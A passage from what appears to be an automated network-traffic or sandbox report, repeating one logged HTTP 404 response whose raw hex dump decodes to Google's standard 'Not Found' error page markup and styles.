6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
